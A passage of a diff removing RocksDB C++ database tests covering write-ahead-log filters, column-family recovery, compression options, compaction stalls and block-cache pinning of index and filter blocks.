-        option_to_return = WalProcessingOption::kContinueProcessing;
-      }
-
-      // Filter is passed as a const object for RocksDB to not modify the
-      // object, however we modify it for our own purpose here and hence
-      // cast the constness away.
-      (const_cast<TestWalFilter*>(this)->current_record_index_)++;
-
-      return option_to_return;
-    }
-
-    virtual const char* Name() const override { return "TestWalFilter"; }
-  };
-
-  // Create 3 batches with two keys each
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  // Test with all WAL processing options
-  for (int option = 0;
-    option < static_cast<int>(
-    WalFilter::WalProcessingOption::kWalProcessingOptionMax);
-  option++) {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({ "pikachu" }, options);
-
-    // Write given keys in given batches
-    for (size_t i = 0; i < batch_keys.size(); i++) {
-      WriteBatch batch;
-      for (size_t j = 0; j < batch_keys[i].size(); j++) {
-        batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-      }
-      dbfull()->Write(WriteOptions(), &batch);
-    }
-
-    WalFilter::WalProcessingOption wal_processing_option =
-      static_cast<WalFilter::WalProcessingOption>(option);
-
-    // Create a test filter that would apply wal_processing_option at the first
-    // record
-    size_t apply_option_for_record_index = 1;
-    TestWalFilter test_wal_filter(wal_processing_option,
-      apply_option_for_record_index);
-
-    // Reopen database with option to use WAL filter
-    options = OptionsForLogIterTest();
-    options.wal_filter = &test_wal_filter;
-    Status status =
-      TryReopenWithColumnFamilies({ "default", "pikachu" }, options);
-    if (wal_processing_option ==
-      WalFilter::WalProcessingOption::kCorruptedRecord) {
-      assert(!status.ok());
-      // In case of corruption we can turn off paranoid_checks to reopen
-      // databse
-      options.paranoid_checks = false;
-      ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-    }
-    else {
-      assert(status.ok());
-    }
-
-    // Compute which keys we expect to be found
-    // and which we expect not to be found after recovery.
-    std::vector<Slice> keys_must_exist;
-    std::vector<Slice> keys_must_not_exist;
-    switch (wal_processing_option) {
-    case WalFilter::WalProcessingOption::kCorruptedRecord:
-    case WalFilter::WalProcessingOption::kContinueProcessing: {
-      fprintf(stderr, "Testing with complete WAL processing\n");
-      // we expect all records to be processed
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          keys_must_exist.push_back(Slice(batch_keys[i][j]));
-        }
-      }
-      break;
-    }
-    case WalFilter::WalProcessingOption::kIgnoreCurrentRecord: {
-      fprintf(stderr,
-        "Testing with ignoring record %" ROCKSDB_PRIszt " only\n",
-        apply_option_for_record_index);
-      // We expect the record with apply_option_for_record_index to be not
-      // found.
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          if (i == apply_option_for_record_index) {
-            keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-          }
-          else {
-            keys_must_exist.push_back(Slice(batch_keys[i][j]));
-          }
-        }
-      }
-      break;
-    }
-    case WalFilter::WalProcessingOption::kStopReplay: {
-      fprintf(stderr,
-        "Testing with stopping replay from record %" ROCKSDB_PRIszt
-        "\n",
-        apply_option_for_record_index);
-      // We expect records beyond apply_option_for_record_index to be not
-      // found.
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          if (i >= apply_option_for_record_index) {
-            keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-          }
-          else {
-            keys_must_exist.push_back(Slice(batch_keys[i][j]));
-          }
-        }
-      }
-      break;
-    }
-    default:
-      assert(false);  // unhandled case
-    }
-
-    bool checked_after_reopen = false;
-
-    while (true) {
-      // Ensure that expected keys exists
-      // and not expected keys don't exist after recovery
-      ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-
-      if (checked_after_reopen) {
-        break;
-      }
-
-      // reopen database again to make sure previous log(s) are not used
-      //(even if they were skipped)
-      // reopn database with option to use WAL filter
-      options = OptionsForLogIterTest();
-      ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-      checked_after_reopen = true;
-    }
-  }
-}
-
-TEST_F(DBTest2, WalFilterTestWithChangeBatch) {
-  class ChangeBatchHandler : public WriteBatch::Handler {
-  private:
-    // Batch to insert keys in
-    WriteBatch* new_write_batch_;
-    // Number of keys to add in the new batch
-    size_t num_keys_to_add_in_new_batch_;
-    // Number of keys added to new batch
-    size_t num_keys_added_;
-
-  public:
-    ChangeBatchHandler(WriteBatch* new_write_batch,
-      size_t num_keys_to_add_in_new_batch)
-      : new_write_batch_(new_write_batch),
-      num_keys_to_add_in_new_batch_(num_keys_to_add_in_new_batch),
-      num_keys_added_(0) {}
-    virtual void Put(const Slice& key, const Slice& value) override {
-      if (num_keys_added_ < num_keys_to_add_in_new_batch_) {
-        new_write_batch_->Put(key, value);
-        ++num_keys_added_;
-      }
-    }
-  };
-
-  class TestWalFilterWithChangeBatch : public WalFilter {
-  private:
-    // Index at which to start changing records
-    size_t change_records_from_index_;
-    // Number of keys to add in the new batch
-    size_t num_keys_to_add_in_new_batch_;
-    // Current record index, incremented with each record encountered.
-    size_t current_record_index_;
-
-  public:
-    TestWalFilterWithChangeBatch(size_t change_records_from_index,
-      size_t num_keys_to_add_in_new_batch)
-      : change_records_from_index_(change_records_from_index),
-      num_keys_to_add_in_new_batch_(num_keys_to_add_in_new_batch),
-      current_record_index_(0) {}
-
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      if (current_record_index_ >= change_records_from_index_) {
-        ChangeBatchHandler handler(new_batch, num_keys_to_add_in_new_batch_);
-        batch.Iterate(&handler);
-        *batch_changed = true;
-      }
-
-      // Filter is passed as a const object for RocksDB to not modify the
-      // object, however we modify it for our own purpose here and hence
-      // cast the constness away.
-      (const_cast<TestWalFilterWithChangeBatch*>(this)
-        ->current_record_index_)++;
-
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "TestWalFilterWithChangeBatch";
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // Create a test filter that would apply wal_processing_option at the first
-  // record
-  size_t change_records_from_index = 1;
-  size_t num_keys_to_add_in_new_batch = 1;
-  TestWalFilterWithChangeBatch test_wal_filter_with_change_batch(
-    change_records_from_index, num_keys_to_add_in_new_batch);
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_with_change_batch;
-  ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-  // Ensure that all keys exist before change_records_from_index_
-  // And after that index only single key exists
-  // as our filter adds only single key for each batch
-  std::vector<Slice> keys_must_exist;
-  std::vector<Slice> keys_must_not_exist;
-
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      if (i >= change_records_from_index && j >= num_keys_to_add_in_new_batch) {
-        keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-      }
-      else {
-        keys_must_exist.push_back(Slice(batch_keys[i][j]));
-      }
-    }
-  }
-
-  bool checked_after_reopen = false;
-
-  while (true) {
-    // Ensure that expected keys exists
-    // and not expected keys don't exist after recovery
-    ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-
-    if (checked_after_reopen) {
-      break;
-    }
-
-    // reopen database again to make sure previous log(s) are not used
-    //(even if they were skipped)
-    // reopn database with option to use WAL filter
-    options = OptionsForLogIterTest();
-    ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-    checked_after_reopen = true;
-  }
-}
-
-TEST_F(DBTest2, WalFilterTestWithChangeBatchExtraKeys) {
-  class TestWalFilterWithChangeBatchAddExtraKeys : public WalFilter {
-  public:
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      *new_batch = batch;
-      new_batch->Put("key_extra", "value_extra");
-      *batch_changed = true;
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "WalFilterTestWithChangeBatchExtraKeys";
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // Create a test filter that would add extra keys
-  TestWalFilterWithChangeBatchAddExtraKeys test_wal_filter_extra_keys;
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_extra_keys;
-  Status status = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(status.IsNotSupported());
-
-  // Reopen without filter, now reopen should succeed - previous
-  // attempt to open must not have altered the db.
-  options = OptionsForLogIterTest();
-  ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-  std::vector<Slice> keys_must_exist;
-  std::vector<Slice> keys_must_not_exist;  // empty vector
-
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      keys_must_exist.push_back(Slice(batch_keys[i][j]));
-    }
-  }
-
-  ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-}
-
-TEST_F(DBTest2, WalFilterTestWithColumnFamilies) {
-  class TestWalFilterWithColumnFamilies : public WalFilter {
-  private:
-    // column_family_id -> log_number map (provided to WALFilter)
-    std::map<uint32_t, uint64_t> cf_log_number_map_;
-    // column_family_name -> column_family_id map (provided to WALFilter)
-    std::map<std::string, uint32_t> cf_name_id_map_;
-    // column_family_name -> keys_found_in_wal map
-    // We store keys that are applicable to the column_family
-    // during recovery (i.e. aren't already flushed to SST file(s))
-    // for verification against the keys we expect.
-    std::map<uint32_t, std::vector<std::string>> cf_wal_keys_;
-  public:
-    virtual void ColumnFamilyLogNumberMap(
-      const std::map<uint32_t, uint64_t>& cf_lognumber_map,
-      const std::map<std::string, uint32_t>& cf_name_id_map) override {
-      cf_log_number_map_ = cf_lognumber_map;
-      cf_name_id_map_ = cf_name_id_map;
-    }
-
-    virtual WalProcessingOption LogRecordFound(unsigned long long log_number,
-      const std::string& log_file_name,
-      const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) override {
-      class LogRecordBatchHandler : public WriteBatch::Handler {
-      private:
-        const std::map<uint32_t, uint64_t> & cf_log_number_map_;
-        std::map<uint32_t, std::vector<std::string>> & cf_wal_keys_;
-        unsigned long long log_number_;
-      public:
-        LogRecordBatchHandler(unsigned long long current_log_number,
-          const std::map<uint32_t, uint64_t> & cf_log_number_map,
-          std::map<uint32_t, std::vector<std::string>> & cf_wal_keys) :
-          cf_log_number_map_(cf_log_number_map),
-          cf_wal_keys_(cf_wal_keys),
-          log_number_(current_log_number){}
-
-        virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-          const Slice& /*value*/) override {
-          auto it = cf_log_number_map_.find(column_family_id);
-          assert(it != cf_log_number_map_.end());
-          unsigned long long log_number_for_cf = it->second;
-          // If the current record is applicable for column_family_id
-          // (i.e. isn't flushed to SST file(s) for column_family_id)
-          // add it to the cf_wal_keys_ map for verification.
-          if (log_number_ >= log_number_for_cf) {
-            cf_wal_keys_[column_family_id].push_back(std::string(key.data(),
-              key.size()));
-          }
-          return Status::OK();
-        }
-      } handler(log_number, cf_log_number_map_, cf_wal_keys_);
-
-      batch.Iterate(&handler);
-
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "WalFilterTestWithColumnFamilies";
-    }
-
-    const std::map<uint32_t, std::vector<std::string>>& GetColumnFamilyKeys() {
-      return cf_wal_keys_;
-    }
-
-    const std::map<std::string, uint32_t> & GetColumnFamilyNameIdMap() {
-      return cf_name_id_map_;
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys_pre_flush(3);
-
-  batch_keys_pre_flush[0].push_back("key1");
-  batch_keys_pre_flush[0].push_back("key2");
-  batch_keys_pre_flush[1].push_back("key3");
-  batch_keys_pre_flush[1].push_back("key4");
-  batch_keys_pre_flush[2].push_back("key5");
-  batch_keys_pre_flush[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys_pre_flush.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys_pre_flush[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys_pre_flush[i][j], DummyString(1024));
-      batch.Put(handles_[1], batch_keys_pre_flush[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  //Flush default column-family
-  db_->Flush(FlushOptions(), handles_[0]);
-
-  // Do some more writes
-  std::vector<std::vector<std::string>> batch_keys_post_flush(3);
-
-  batch_keys_post_flush[0].push_back("key7");
-  batch_keys_post_flush[0].push_back("key8");
-  batch_keys_post_flush[1].push_back("key9");
-  batch_keys_post_flush[1].push_back("key10");
-  batch_keys_post_flush[2].push_back("key11");
-  batch_keys_post_flush[2].push_back("key12");
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys_post_flush[i][j], DummyString(1024));
-      batch.Put(handles_[1], batch_keys_post_flush[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // On Recovery we should only find the second batch applicable to default CF
-  // But both batches applicable to pikachu CF
-
-  // Create a test filter that would add extra keys
-  TestWalFilterWithColumnFamilies test_wal_filter_column_families;
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_column_families;
-  Status status =
-    TryReopenWithColumnFamilies({ "default", "pikachu" }, options);
-  ASSERT_TRUE(status.ok());
-
-  // verify that handles_[0] only has post_flush keys
-  // while handles_[1] has pre and post flush keys
-  auto cf_wal_keys = test_wal_filter_column_families.GetColumnFamilyKeys();
-  auto name_id_map = test_wal_filter_column_families.GetColumnFamilyNameIdMap();
-  size_t index = 0;
-  auto keys_cf = cf_wal_keys[name_id_map[kDefaultColumnFamilyName]];
-  //default column-family, only post_flush keys are expected
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_post_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-  ASSERT_TRUE(index == keys_cf.size());
-
-  index = 0;
-  keys_cf = cf_wal_keys[name_id_map["pikachu"]];
-  //pikachu column-family, all keys are expected
-  for (size_t i = 0; i < batch_keys_pre_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_pre_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_pre_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_post_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-  ASSERT_TRUE(index == keys_cf.size());
-}
-
-TEST_F(DBTest2, PresetCompressionDict) {
-  const size_t kBlockSizeBytes = 4 << 10;
-  const size_t kL0FileBytes = 128 << 10;
-  const size_t kApproxPerBlockOverheadBytes = 50;
-  const int kNumL0Files = 5;
-
-  Options options;
-  options.env = CurrentOptions().env; // Make sure to use any custom env that the test is configured with.
-  options.allow_concurrent_memtable_write = false;
-  options.arena_block_size = kBlockSizeBytes;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kL0FileBytes / kBlockSizeBytes));
-  options.num_levels = 2;
-  options.target_file_size_base = kL0FileBytes;
-  options.target_file_size_multiplier = 2;
-  options.write_buffer_size = kL0FileBytes;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = kBlockSizeBytes;
-  std::vector<CompressionType> compression_types;
-  if (Zlib_Supported()) {
-    compression_types.push_back(kZlibCompression);
-  }
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  compression_types.push_back(kLZ4Compression);
-  compression_types.push_back(kLZ4HCCompression);
-#endif                          // LZ4_VERSION_NUMBER >= 10400
-  if (ZSTD_Supported()) {
-    compression_types.push_back(kZSTD);
-  }
-
-  for (auto compression_type : compression_types) {
-    options.compression = compression_type;
-    size_t prev_out_bytes;
-    for (int i = 0; i < 2; ++i) {
-      // First iteration: compress without preset dictionary
-      // Second iteration: compress with preset dictionary
-      // To make sure the compression dictionary was actually used, we verify
-      // the compressed size is smaller in the second iteration. Also in the
-      // second iteration, verify the data we get out is the same data we put
-      // in.
-      if (i) {
-        options.compression_opts.max_dict_bytes = kBlockSizeBytes;
-      } else {
-        options.compression_opts.max_dict_bytes = 0;
-      }
-
-      options.statistics = rocksdb::CreateDBStatistics();
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      CreateAndReopenWithCF({"pikachu"}, options);
-      Random rnd(301);
-      std::string seq_data =
-          RandomString(&rnd, kBlockSizeBytes - kApproxPerBlockOverheadBytes);
-
-      ASSERT_EQ(0, NumTableFilesAtLevel(0, 1));
-      for (int j = 0; j < kNumL0Files; ++j) {
-        for (size_t k = 0; k < kL0FileBytes / kBlockSizeBytes + 1; ++k) {
-          ASSERT_OK(Put(1, Key(static_cast<int>(
-                               j * (kL0FileBytes / kBlockSizeBytes) + k)),
-                        seq_data));
-        }
-        dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-        ASSERT_EQ(j + 1, NumTableFilesAtLevel(0, 1));
-      }
-      db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-      ASSERT_EQ(0, NumTableFilesAtLevel(0, 1));
-      ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-
-      size_t out_bytes = 0;
-      std::vector<std::string> files;
-      GetSstFiles(dbname_, &files);
-      for (const auto& file : files) {
-        uint64_t curr_bytes;
-        env_->GetFileSize(dbname_ + "/" + file, &curr_bytes);
-        out_bytes += static_cast<size_t>(curr_bytes);
-      }
-
-      for (size_t j = 0; j < kNumL0Files * (kL0FileBytes / kBlockSizeBytes);
-           j++) {
-        ASSERT_EQ(seq_data, Get(1, Key(static_cast<int>(j))));
-      }
-      if (i) {
-        ASSERT_GT(prev_out_bytes, out_bytes);
-      }
-      prev_out_bytes = out_bytes;
-      DestroyAndReopen(options);
-    }
-  }
-}
-
-class CompactionCompressionListener : public EventListener {
- public:
-  explicit CompactionCompressionListener(Options* db_options)
-      : db_options_(db_options) {}
-
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    // Figure out last level with files
-    int bottommost_level = 0;
-    for (int level = 0; level < db->NumberLevels(); level++) {
-      std::string files_at_level;
-      ASSERT_TRUE(
-          db->GetProperty("rocksdb.num-files-at-level" + NumberToString(level),
-                          &files_at_level));
-      if (files_at_level != "0") {
-        bottommost_level = level;
-      }
-    }
-
-    if (db_options_->bottommost_compression != kDisableCompressionOption &&
-        ci.output_level == bottommost_level && ci.output_level >= 2) {
-      ASSERT_EQ(ci.compression, db_options_->bottommost_compression);
-    } else if (db_options_->compression_per_level.size() != 0) {
-      ASSERT_EQ(ci.compression,
-                db_options_->compression_per_level[ci.output_level]);
-    } else {
-      ASSERT_EQ(ci.compression, db_options_->compression);
-    }
-    max_level_checked = std::max(max_level_checked, ci.output_level);
-  }
-
-  int max_level_checked = 0;
-  const Options* db_options_;
-};
-
-TEST_F(DBTest2, CompressionOptions) {
-  if (!Zlib_Supported() || !Snappy_Supported()) {
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 2;
-  options.max_bytes_for_level_base = 100;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 7;
-  options.max_background_compactions = 1;
-
-  CompactionCompressionListener* listener =
-      new CompactionCompressionListener(&options);
-  options.listeners.emplace_back(listener);
-
-  const int kKeySize = 5;
-  const int kValSize = 20;
-  Random rnd(301);
-
-  for (int iter = 0; iter <= 2; iter++) {
-    listener->max_level_checked = 0;
-
-    if (iter == 0) {
-      // Use different compression algorithms for different levels but
-      // always use Zlib for bottommost level
-      options.compression_per_level = {kNoCompression,     kNoCompression,
-                                       kNoCompression,     kSnappyCompression,
-                                       kSnappyCompression, kSnappyCompression,
-                                       kZlibCompression};
-      options.compression = kNoCompression;
-      options.bottommost_compression = kZlibCompression;
-    } else if (iter == 1) {
-      // Use Snappy except for bottommost level use ZLib
-      options.compression_per_level = {};
-      options.compression = kSnappyCompression;
-      options.bottommost_compression = kZlibCompression;
-    } else if (iter == 2) {
-      // Use Snappy everywhere
-      options.compression_per_level = {};
-      options.compression = kSnappyCompression;
-      options.bottommost_compression = kDisableCompressionOption;
-    }
-
-    DestroyAndReopen(options);
-    // Write 10 random files
-    for (int i = 0; i < 10; i++) {
-      for (int j = 0; j < 5; j++) {
-        ASSERT_OK(
-            Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValSize)));
-      }
-      ASSERT_OK(Flush());
-      dbfull()->TEST_WaitForCompact();
-    }
-
-    // Make sure that we wrote enough to check all 7 levels
-    ASSERT_EQ(listener->max_level_checked, 6);
-  }
-}
-
-class CompactionStallTestListener : public EventListener {
- public:
-  CompactionStallTestListener() : compacted_files_cnt_(0) {}
-
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    ASSERT_EQ(ci.cf_name, "default");
-    ASSERT_EQ(ci.base_input_level, 0);
-    ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum);
-    compacted_files_cnt_ += ci.input_files.size();
-  }
-  std::atomic<size_t> compacted_files_cnt_;
-};
-
-TEST_F(DBTest2, CompactionStall) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkCompaction", "DBTest2::CompactionStall:0"},
-       {"DBImpl::BGWorkCompaction", "DBTest2::CompactionStall:1"},
-       {"DBTest2::CompactionStall:2",
-        "DBImpl::NotifyOnCompactionCompleted::UnlockMutex"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 4;
-  options.max_background_compactions = 40;
-  CompactionStallTestListener* listener = new CompactionStallTestListener();
-  options.listeners.emplace_back(listener);
-  DestroyAndReopen(options);
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  Random rnd(301);
-
-  // 4 Files in L0
-  for (int i = 0; i < 4; i++) {
-    for (int j = 0; j < 10; j++) {
-      ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for compaction to be triggered
-  TEST_SYNC_POINT("DBTest2::CompactionStall:0");
-
-  // Clear "DBImpl::BGWorkCompaction" SYNC_POINT since we want to hold it again
-  // at DBTest2::CompactionStall::1
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Another 6 L0 files to trigger compaction again
-  for (int i = 0; i < 6; i++) {
-    for (int j = 0; j < 10; j++) {
-      ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for another compaction to be triggered
-  TEST_SYNC_POINT("DBTest2::CompactionStall:1");
-
-  // Hold NotifyOnCompactionCompleted in the unlock mutex section
-  TEST_SYNC_POINT("DBTest2::CompactionStall:2");
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_LT(NumTableFilesAtLevel(0),
-            options.level0_file_num_compaction_trigger);
-  ASSERT_GT(listener->compacted_files_cnt_.load(),
-            10 - options.level0_file_num_compaction_trigger);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest2, FirstSnapshotTest) {
-  Options options;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // This snapshot will have sequence number 0 what is expected behaviour.
-  const Snapshot* s1 = db_->GetSnapshot();
-
-  Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-  Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-
-  db_->ReleaseSnapshot(s1);
-}
-
-class PinL0IndexAndFilterBlocksTest : public DBTestBase,
-                                      public testing::WithParamInterface<bool> {
- public:
-  PinL0IndexAndFilterBlocksTest() : DBTestBase("/db_pin_l0_index_bloom_test") {}
-  virtual void SetUp() override { infinite_max_files_ = GetParam(); }
-
-  void CreateTwoLevels(Options* options, bool close_afterwards) {
-    if (infinite_max_files_) {
-      options->max_open_files = -1;
-    }
-    options->create_if_missing = true;
-    options->statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-    table_options.pin_l0_filter_and_index_blocks_in_cache = true;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-    options->table_factory.reset(new BlockBasedTableFactory(table_options));
-    CreateAndReopenWithCF({"pikachu"}, *options);
-
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    // move this table to L1
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-
-    // reset block cache
-    table_options.block_cache = NewLRUCache(64 * 1024);
-    options->table_factory.reset(NewBlockBasedTableFactory(table_options));
-    TryReopenWithColumnFamilies({"default", "pikachu"}, *options);
-    // create new table at L0
-    Put(1, "a2", "begin2");
-    Put(1, "z2", "end2");
-    ASSERT_OK(Flush(1));
-
-    if (close_afterwards) {
-      Close();  // This ensures that there is no ref to block cache entries
-    }
-    table_options.block_cache->EraseUnRefEntries();
-  }
-
-  bool infinite_max_files_;
-};
-
-TEST_P(PinL0IndexAndFilterBlocksTest,
-       IndexAndFilterBlocksOfNewTableAddedToCacheWithPinning) {
-  Options options = CurrentOptions();
-  if (infinite_max_files_) {
-    options.max_open_files = -1;
-  }
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.pin_l0_filter_and_index_blocks_in_cache = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-
-  // index/filter blocks added to block cache right after table creation.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // only index/filter were added
-  ASSERT_EQ(2, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-
-  std::string value;
-  // Miss and hit count should remain the same, they're all pinned.
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // Miss and hit count should remain the same, they're all pinned.
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
